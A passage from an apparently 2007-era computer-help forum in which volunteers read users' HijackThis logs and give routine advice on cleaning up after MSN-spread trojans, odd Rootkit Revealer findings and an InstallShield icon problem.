O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra 'Tools' menuitem: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Users\YongShun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU\Run IMVU.lnk (file missing)
O13 - Gopher Prefix:
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab56986.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {E008A543-CEFB-4559-912F-C27C2B89F13B} (Domino Web Access 7 Control) - https://npsdmail3.np.edu.sg/dwa7W.cab
O20 - Winlogon Notify: avgwlntf - C:\Windows\SYSTEM32\avgwlntf.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: Ac Profile Manager Service (AcPrfMgrSvc) - Lenovo - C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
O23 - Service: Access Connections Main Service (AcSvc) - Lenovo - C:\Program Files\ThinkPad\ConnectUtilities\AcSvc.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\Windows\system32\agrsmsvc.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG7 Resident Shield Service (AvgCoreSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgrssvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: Fn+F5 Service (FNF5SVC) - Lenovo. - C:\Program Files\LENOVO\HOTKEY\FNF5SVC.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: IPS Core Service (IPSSVC) - Lenovo Group Limited - C:\Windows\system32\IPSSVC.EXE
O23 - Service: Softex OmniPass Service (omniserv) - Softex Inc. - C:\Program Files\Softex\OmniPass\OmniServ.exe
O23 - Service: PMSveH - Lenovo - C:\Program Files\Lenovo\PM Driver\PMSveH.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: System Update (SUService) - Lenovo Group Limited - C:\Program Files\Lenovo\System Update\SUService.exe
O23 - Service: ThinkVantage Registry Monitor Service - Lenovo Group Limited - C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
O23 - Service: On Screen Display (TPHKSVC) - Unknown owner - C:\Program Files\LENOVO\HOTKEY\TPHKSVC.exe
O23 - Service: TVT Backup Protection Service - Unknown owner - C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
O23 - Service: TVT Backup Service - Lenovo Group Limited - C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe
O23 - Service: TVT Scheduler - Lenovo Group Limited - c:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe

--
End of file - 10283 bytesThanks for the new log, Jeff.  I'll take a look in about five minutes.Sorry that took so long; you had a few things I wasn't familiar with, so it took some extra research.  I just realized...this is my first Vista log.  How exciting.  Heh.  Anyway, I took a good look at your log and it doesn't look too bad.  There are a couple of things you can get rid of, however.

Before you do anything...I see that you have HijackThis running from your desktop.  You have it in a permanent location, which is good because it makes important backups that you may end up needing.  However, to help you avoid clutter and to help ensure that the backups stay safe, I would like you to move it to a special location.

  • Double-click on My Computer to OPEN it and navigate to C:\Program Files.
  • Right-click on the empty (white) space and go to New > Folder.
  • Name the folder something like HJT and move HijackThis into that new folder.
  • If you would still like to run HijackThis from the desktop for convenience, right-click on HijackThis and click on Create Shortcut.  This will create a shortcut to the program; move the shortcut to the desktop.
.
.
Now we can start.  Open HijackThis and scan again.  Check the following entries, but don't do anything to them yet...

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =

O1 - Hosts: ::1 localhost

O13 - Gopher Prefix:


Now, close all windows (including this one) besides HijackThis, then click Fix Checked.


No malicious files are showing up.  Do remember the name of the file you saved?  Have you been experiencing any actual problems/symptoms?kk..i have fixed things you tell me to do..
yar..i forgot about the name of the file, it just disappear after i have saved it.
My computer seems fine to me, no laggy, no pop-up ....
and the spybot has help me fixed my computer.
I just want to check is my computer are okay...for that stupid link i click in msn.

(...lol..cool..ur first time vista log by ME..haha...cool..lolz)Well, as long as you keep your protection programs UPDATED and perform regular scans in Safe Mode, and as long as you're not experiencing any problems, I wouldn't be too concerned.  My guess is that Spybot already picked up the file and cleaned it.

However, if you would like, I can take a look at a ComboFix log for you.  Just download ComboFix and save it to your desktop.  Run the program and read its disclaimer (it's fairly short) and make sure you really pay attention to what it says.  Follow the prompts and when finished, it will produce a log at C:\ComboFix.txt.  Go ahead and post that here.  Note: Don't click on the window while it's running; this may cause stalls.i download combofix...then when i extract, theres one file and one program that was named as start..so i click start, just only a few seconds, the two things just disappear from my desktop...
i check my c drive, but i didn't found any combofix.txt... i only found vundofix.txt


VundoFix V6.4.2

Checking Java VERSION...

Java version is 1.5.0.6
Old versions of java are exploitable and should be removed.

Scan started at 8:51:03 AM 5/6/2007

Listing files found while scanning....

No infected files were found.That concerned me for a second, but I looked into it and it seems that ComboFix doesn't work with Vista yet.  We'll just have to rely on HijackThis for now, it seems.  I don't think you have anything to worry about, though.

You may want to remove your older version of Java.  All it's really doing is taking up space.o..kk..i will start removing it...thx...=)No problemo.  If you need help with anything else, feel free to ask.
106.

Solve : rootkit revealer?

Answer»

Hello,

I D-loaded rootkit revealer.  2 discrepancies were found HKLM\SECURITY\POLICY \SECRETS\SAC  & The other read the same thing exept \SAI at the end.  What does this mean?

I came to use rootkit revealer because I ran AD Aware 2007 2x consecutively and the same issue continued to show up.  Another person in the forum suggested rootkit to see what it revealed. 

Can anybody help?
I found this link, which basically sums it up...
http://forum.sysinternals.com/forum_posts.asp?TID=8881&PN=1

I've never used Rootkit Revealer myself, but this appears to be very normal, based on all of the pages I've read.  WHATEVER Ad-Aware is finding could be perfectly harmless.  However, if you're paranoid about infections, you're more than welcome to post a HijackThis log.Thanks Matt! No problemo.

-----------------

As this issue appears to be resolved, I am closing this topic.  If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you REQUIRE help, please start a New Topic with information about your computer and your problem.

107.

Solve : Macfee Problem?

Answer»

I installed Macfee anti virus in my PC before finishing it automatically restarting continously .... may i know what is the problem



Regards
I'd love to help you, but it's not exactly clear to me what is going on.
What's your OS?
Are you SAYING that your computer automatically RESTARTED before you could install McAfee?
Are you also saying that it continues to restart on a loop?
Where did you get this copy of McAfee?
Can you boot into Safe MODE?

Please post back with as MUCH information as possible.Due to lack of feedback, I am closing this topic.  If you are the original poster and you WOULD like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.

108.

Solve : winlogon.exe not found?

Answer»

Hello I'm new, I'm only 15-years-old and hope you guys could help
I have a problem with my computer.

For some reason when my computer turns on, and when I login to my account or to any other account, there is a pop up saying something about not being able to find "C:\WINDOWS\system32\ydtrlywft/winlogon.exe"

After checking the folder at "C:\WINDOWS\system32\ydtrlywft" I found only one thing and it was a Configuration Setting called "winlogon". When i open it it automatically opens with the "Notepad.exe".

This problem started to occur when I got a virus from MSN Messenger, a friend of mine got it, and he tried to get rid of it before the virus spread itself, but it was too late, a conversation WINDOW opened and it was saying something to like download, and it had reassuring words, that this wasn't a virus, my friend never knew the virus would just open random conversation windows and send the link to contacts. So since he was my friend, I trusted him and downloaded it (I was extremely OBLIVIOUS from what it really was).

So after downloading the program, I opened the setup and it did EVERYTHING by itself and then it started spreading the links to my contacts, so then I'm like "Oh ****" and I QUICKLY closed my MSN and started phone everyone that I had in my contacts.

I have "AVG Anti-Virus" and "AVG Anti-Spyware" and they never let me down, I've been using them for at least 3-2 years, and no problem. I did a spyware scan and virus scan, nothing came up from my spyware scan, but a virus was detected from my AVG Anti-Virus.

The next day after I logged on to my account, my AVG Virus detected Virus popped up, and it caught the virus and got rid of it.

A few hours after I found that the virus was in the vault and heres a table of it, and all these infections was because of the Virus.

This is the table in the virus vault, but I made it differently (don't know how to use html that well), hope you can find the what it it [List is according to Date of Detection]
Infected or Healed= Infected
Virus Name= Virus found Hosts
Path= C:\WINDOWS\system32\drivers\etc\hosts
Date of Detection= 5/3/2007, 9:04:10 PM
Filename= hosts
File Size= 2.33KB

Infected or Healed= Infected
Virus Name= Trojan horse Downloader.Agent.KNG
Path= C:\Documents and Settings\gurjeet\Desktop\winit.exe
Date of Detection= 5/4/2007, 9:54:27 PM
Filename= winit.exe
File Size= 12 KB

Infected or Healed= Infected
Virus Name= Trojan horse Downloader.Generic3.ZSK
Path= C:\WINDOWS\system32\ydtrlywft\winlogon.exe
Date of Detection= 5/4/2007, 9:54:49 PM
Filename= winlogon.exe
File Size= 75.5 KB

Infected or Healed= Healed
Virus Name= Virus found Hosts
Path= C:\WINDOWS\system32\drivers\etc\hosts
Date of Detection= 5/5/2007, 11:32:26 AM
Filename= hosts
File Size= 1.61 KB

Infected or Healed= Infected
Virus Name= Trojan horse Downloader.Agent.KNG
Path= C:\WINDOWS\w1.exe
Date of Detection= 5/5/2007, 9:20:44 PM
Filename= w1.exe
File Size= 108.41 KB


So now I have no idea what to do about my winlogon.exe, any ideas, and how am i still able to logon without a logon.exe?


Thanks,
Tranc3r



ps. I know this website because i had a project on the history of computers and i used this site XD. Nice history, got 50/50!You had a virus.

The process "winlogon.exe" runs in the background. It's a part of the Windows Login subsystem. Winlogon is necessary for user authorization and checks the Windows XP activation code.

Note: The winlogon.exe file is located in the folder C:\Windows\System32. In other cases, winlogon.exe is a virus, spyware, trojan or worm!


It got removed.

Quote

"C:\WINDOWS\system32\ydtrlywft/winlogon.exe"

That one was a virus, but it looks like it got removed. However, the virus probably left a startup entry in your registry which means that your system still looks for that file to start the trojan program up.

You need to remove the entry. You could try this...

Go to the Start Menu, and in the Run box, type MSCONFIG. When that runs, click the Startup tab  and see if there is a checked entry for Winlogon.exe. If there is, uncheck it. After reboot, the problem should be gone.








contrex's suggestion should help you out (you can also do this using one of the features of AVG Anti-Spyware).  However, you might want to post a HijackThis log so we can see what TRACES (if any) are left.


Also...I'm moving this to the appropriate area.Due to lack of feedback, I am closing this topic.  If you are the original poster and you would like this topic to be re-opened for any reason, PM me or another moderator and it can be arranged.

If you are not the original poster and you require help, please start a New Topic with information about your computer and your problem.
109.

Solve : blank installshield icon?

Answer»

???I'm running Windows XP and Internet Explorer browser.  see attached pic.  please reply if you know what this is and can get RID of it.  thanks, gloria

[cleaning up - attachment deleted by admin]hello welcome to the forum. what kind of protections do you have on your machine anti-virus anti-spyware etc..What program are you trying to install?
Does this happen with every program, or just that one?
How long has this been happening?
Like asked above, what protection do you have?i'm not trying to install any program, it's just there sometimes, not always though.  I was using McAfee but 2 days ago my protection expired and i got rid of that.  now i have zone alarm, avg, and spyware guard, and use adaware too.  the problem started while using mcafee.  thanks!!so the problem as been solved by removing McafeeWell, update AVG and run a scan in Safe Mode.  Then restart and download and scan with HijackThis and post a log.  Don't fix anything with it until told to do so.i attached the hijack this LOGFILE since it exceeded 10000 characters...  also i just remembered that a few times a message has appeared that says i cannot change my startup because i am not an administrator.  when i booted in safe mode, there was an extra user account titled "adminidtrator".  when i boot in normal mode this is not there.  any advice here?  this is a new problem as well, don't know if its connected.  thanks!  gloria

[cleaning up - attachment deleted by admin]no that happens with everything xp system your fine.. its the premade admin accountalright, cool thanks...  Logfile of HijackThis v1.99.1
Scan saved at 11:50:25 AM, on 6/4/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16441)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Microsoft SQL Server\MSSQL$SOSHOME22\Binn\sqlservr.exe
C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\fxssvc.exe
C:\WINDOWS\system32\dllhost.exe
C:\Program Files\Dell\QuickSet\quickset.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\stsystra.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\ehome\ehtray.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\eHome\ehmsas.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\MySpace\IM\MySpaceIM.exe
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\SpywareGuard\sgmain.exe
C:\Program Files\SpywareGuard\sgbhp.exe
C:\PROGRA~1\Grisoft\AVG7\avgw.exe
C:\WINDOWS\system32\wuauclt.exe
c:\program files\common files\installshield\updateservice\isuspm.exe
C:\WINDOWS\System32\svchost.exe
C:\Documents and Settings\Gloria\Local Settings\Temporary Internet Files\Content.IE5\KZWMB5C0\HijackThis[1].exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = [link removed by CBMatt; STRETCHED the page out too far]
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SpywareGuardDLBLOCK.CBrowserHelper - {4A368E80-174F-4872-96B5-0B27DDD11DB2} - C:\Program Files\SpywareGuard\dlprotect.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O2 - BHO: CBrowserHelperObject Object - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - c:\Program Files\GoogleAFE\GoogleAE.dll
O3 - Toolbar: (no name) - {0BF43445-2F28-4351-9252-17FE6E806AA0} - (no file)
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Dell QuickSet] C:\Program Files\Dell\QuickSet\quickset.exe
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SigmatelSysTrayApp] stsystra.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [ISUSPM Startup] "c:\Program Files\Common Files\InstallShield\UpdateService\isuspm.exe" -startup
O4 - HKLM\..\Run: [IntelWireless] C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe /tf Intel PROSet/Wireless
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray.exe
O4 - HKLM\..\Run: [DXDllRegExe] dxdllreg.exe
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE"
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [MySpaceIM] C:\Program Files\MySpace\IM\MySpaceIM.exe
O4 - Startup: SpywareGuard.lnk = C:\Program Files\SpywareGuard\sgmain.exe
O4 - Global Startup: Service Manager.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\inetrepl.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\NETWORK Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {00140000-B1BA-11CE-ABC6-F5B2E79D9E3F} (LEAD Main Control (14.0)) - http://www.sampsonrod.org/controls/LTOCX14N.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} - http://download.games.yahoo.com/games/web_games/popcap/bejeweled2/popcaploader_v6.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxdev.dll
O20 - Winlogon Notify: IntelWireless - C:\Program Files\Intel\Wireless\Bin\LgNotify.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
O23 - Service: EvtEng - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NICCONFIGSVC - Dell Inc. - C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: RegSrvc - Intel Corporation - C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
O23 - Service: Spectrum24 Event Monitor (S24EventMonitor) - Intel Corporation  - C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe
O23 - Service: WLANKEEPER - Intel® Corporation - C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe

Your HijackThis is in a temporary location.  If you leave it there, it (along with its important backups) can and will eventually be deleted.  Please navigate to its current location (C:\Documents and Settings\Gloria\Local Settings\Temporary Internet Files\Content.IE5\KZWMB5C0) and it move to a new permanent folder at C:\Program Files\HJT.

Open up HijackThis and scan, then check the following entries...

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost

O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} - http://download.games.yahoo.com/games/web_games/popcap/bejeweled2/popcaploader_v6.cab

O16 - DPF: {00140000-B1BA-11CE-ABC6-F5B2E79D9E3F} (LEAD Main Control (14.0)) - http://www.sampsonrod.org/controls/LTOCX14N.cab

(Do you recognize this?  If not, then you might want to check it also.)

Close all windows (except for HijackThis) and click on Fix Checked.  Close HijackThis.



That's really all I found in your log.  Are you doing regular virus scans?  That's very important.  However, I don't think your problem is a virus.  First, you should update your Java.  You should also update your video card drivers.  If you need help with that, we can assist you.  Next, I'm going to suggest that you go to the following link and read the Solution for IE7 users...
http://support.installshield.com/kb/view.asp?articleid=Q113283

Once you've done all of this, let us know how it went.ok.  this makes me feel like a complete idiot.  i cannot find the hijack this program.  i am viewing all files, even hidden ones, and i am at C:\documents and settings\gloria\local settings  - there is no temporary internet files folder.  I have a folder titled "Application Data" and one titled "Temp" and one file titled "TempIadHide3.dll".  i don't know where else to look.  gloriawell i just downloaded hjt to somewhere easy to find.  anyway, i took off what you told me, here's the new log.  thanks, gloria

Logfile of HijackThis v1.99.1
Scan saved at 12:18:35 AM, on 6/5/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16441)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Dell\QuickSet\quickset.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\stsystra.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\ehome\ehtray.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\MySpace\IM\MySpaceIM.exe
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\SpywareGuard\sgmain.exe
C:\Program Files\SpywareGuard\sgbhp.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
